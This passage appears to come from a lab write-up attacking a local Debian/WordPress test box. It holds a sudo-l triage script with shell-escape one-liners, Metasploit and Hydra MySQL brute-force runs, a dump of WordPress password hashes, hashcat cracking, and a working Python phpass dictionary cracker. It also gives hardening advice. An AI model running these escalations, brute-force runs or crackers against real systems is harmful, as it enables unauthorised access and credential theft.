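    "python3": "python3 -c 'import os; os.system(\"/bin/sh\")'",
    "env":     "env /bin/sh",
    "bash":    "bash",
}

# "(root) NOPASSWD: /usr/bin/find" -> runas, tags, comma-separated command list
_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Turn the rules section of `sudo -l` output into dicts (runas, nopasswd, command)."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True            # everything before this line is the Defaults block
            continue
        m = _RULE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()      # "(root)" or "(ALL : ALL)"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "command": cmd.strip()})
    return rules


def triage(text):
    """Flag rules that hand out a shell: ALL, or a binary from SHELL_CAPABLE."""
    hits = []
    for rule in parse_sudo_l(text):
        cmd = rule["command"]
        name = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
        if name == "ALL" or name in SHELL_CAPABLE:
            hits.append({**rule, "escalation": SHELL_CAPABLE.get(name, "sudo /bin/sh")})
    return hits


# The sudo -l output from the box above, as sample input.
SAMPLE_SUDO_L = """\
Matching Defaults entries for vagrant on debian10:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User vagrant may run the following commands on debian10:
    (root) NOPASSWD: /usr/bin/find
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE_SUDO_L):
        print(f"{hit['command']} as {hit['runas']} (nopasswd={hit['nopasswd']}): {hit['escalation']}")
```

The parser ignores the Defaults block and splits comma-separated command lists, so it also copes with rules like `(ALL : ALL) ALL` or `(root) SETENV: NOPASSWD: /usr/bin/vim, /bin/ls`. The fix on the host side is to grant specific, non-interactive commands only, never a binary that can exec something else.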
Now the MySQL service on port 3306. We try to connect as root first; pressing Enter at the prompt (empty password) is rejected:
mysql -u root -p -h 192.168.0.108
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.109' (using password: NO)
From Metasploit, the mysql_login scanner fed with unix_passwords.txt against root finds nothing either:
msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.3.27-dev ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Adapter names can be used for IP params
set LHOST eth0
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search mysql_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login
msf6 > use 0
msf6 auxiliary(scanner/mysql/mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted
: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-met
asploit/basics/using-metasploit.html
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair p
er line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/mysql/mysql_login) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/mysql/mysql_login) > set rhost 192.168.0.108
rhost => 192.168.0.108
msf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf6 auxiliary(scanner/mysql/mysql_login) > run
[*] 192.168.0.108:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Hydra is another option:
hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt mysql://192.168.0.108
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 19:15:31
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169512 login tries (l:168/p:1009), ~42378 tries per task
[DATA] attacking mysql://192.168.0.108:3306/
[ERROR] Child with pid 64180 terminating, can not connect
[ERROR] Child with pid 64182 terminating, can not connect
[ERROR] Child with pid 64181 terminating, can not connect
[ERROR] Child with pid 64183 terminating, can not connect
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 19:15:56
Here Hydra fails before it really starts: every child terminates with "can not connect", so this is a connection problem (the server refusing or dropping the parallel sessions), not an exhausted wordlist, and retrying with -t 1 would be the next step. In the end the way in is the default credentials root:root, tried by hand.
We look around MySQL:
mysql -u root -p -h 192.168.0.108
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.3.39-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0,063 sec)
MariaDB [(none)]> show tables;
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_e_events |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
13 rows in set (0,001 sec)
MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
| 1 | admin | $P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L. | admin | [email protected] | http://localhost/wordpress | 2023-06-15 14:30:02 | | 0 | admin |
| 2 | hugo | $P$BpkDfTwUL.u/nPtFwtI0XjFES/GvY90 | hugo | [email protected] | | 2023-06-15 14:32:39 | 1686839559:$P$Bp1eBXl/RR6RcMkYSytgzc1sHt6nml1 | 0 | hugo torres |
| 3 | philip | $P$BkWfN11QN9Q8U8BMAf/x.zJrDQZwZt/ | philip | [email protected] | | 2023-06-15 14:33:13 | 1686839593:$P$BYVMku..4QUJUIzoUHMr8tdsv87TNK/ | 0 | philip padilla |
| 4 | vagrant | $P$BkxK5UElDjCJU1dd19x9PExnko8//h/ | vagrant | [email protected] | | 2023-06-15 14:34:18 | 1686839658:$P$B4eTfAbXY8.IA4sRYmBjlf0DKf0ohH/ | 0 | vagrant vagrant |
+----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
4 rows in set (0,001 sec)
MariaDB [wordpress]>
The user_pass column holds phpass portable hashes ($P$B...: salted, 8192 MD5 rounds, hashcat mode 400). We put the hashes in hash.txt, one per line, and run them against rockyou with Hashcat:
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L.:password
$P$BkWfN11QN9Q8U8BMAf/x.zJrDQZwZt/:password
$P$BpkDfTwUL.u/nPtFwtI0XjFES/GvY90:987654321
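Mode 400 is phpass, the portable hash WordPress 6.2 still uses: MD5(salt + password), then 2^13 = 8192 further MD5 rounds of (previous digest + password), encoded with phpass's own base64 alphabet behind a $P$B<8-char salt> prefix. That is cheap enough for a wordlist to go through in seconds, which is why rockyou recovers three of the hashes. The following added example (my own code, not from the original write-up, WordPress or hashcat) reimplements the algorithm to verify a guess against the hashes from wp_users above and runs a small dictionary attack; the wordlist is constructed, not rockyou.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hashes from the wp_users table above.
WP_HASHES = {
    "admin":   "$P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L.",
    "hugo":    "$P$BpkDfTwUL.u/nPtFwtI0XjFES/GvY90",
    "philip":  "$P$BkWfN11QN9Q8U8BMAf/x.zJrDQZwZt/",
    "vagrant": "$P$BkxK5UElDjCJU1dd19x9PExnko8//h/",
}

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "qwerty", "password", "letmein", "987654321"]


def _encode64(data, count):
    """phpass's base64 variant: 3 bytes -> 4 chars, little-endian, no padding."""
    out, i = [], 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_hash(password, setting):
    """Recompute the portable hash for `password` using the cost and salt in `setting`."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])      # 'B' -> 13 -> 8192 rounds
    if not 7 <= count_log2 <= 30:
        raise ValueError("cost out of range")
    pw = password.encode()
    digest = hashlib.md5(setting[4:12].encode() + pw).digest()   # salt is chars 4..11
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password, stored):
    """True if `password` reproduces `stored`; constant-time compare of the full string."""
    try:
        return hmac.compare_digest(phpass_hash(password, stored), stored)
    except ValueError:
        return False


def crack(hashes, wordlist):
    """Dictionary attack: map user -> recovered password for every hash a word matches."""
    found = {}
    for word in wordlist:
        word = word.rstrip("\r\n")
        for user, stored in hashes.items():
            if user not in found and phpass_verify(word, stored):
                found[user] = word
        if len(found) == len(hashes):
            break
    return found


if __name__ == "__main__":
    for user, pw in crack(WP_HASHES, WORDLIST).items():
        print(f"{user}: {pw}")     # admin, philip -> password; hugo -> 987654321
```

With this list the vagrant hash stays uncracked, the same outcome the hashcat run above shows for it. Each guess costs 8193 MD5 calls per distinct salt, so even in pure Python the four hashes take well under a second per word; a GPU with hashcat does millions per second, which is the practical argument for moving WordPress to a bcrypt or Argon2 hasher and for not letting users pick "password".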
